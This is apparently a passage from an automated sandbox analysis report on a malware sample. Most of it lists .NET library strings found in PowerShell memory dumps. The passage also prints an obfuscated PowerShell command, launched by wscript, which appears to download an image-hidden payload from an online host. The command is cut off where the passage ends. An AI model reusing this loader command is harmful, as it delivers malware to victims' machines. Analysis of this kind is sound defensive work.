                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: D:\New Private Panell Src 3.0\dnlib-fuscator-master win7 fix\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp

                  Data Obfuscation

                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? 
? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ?
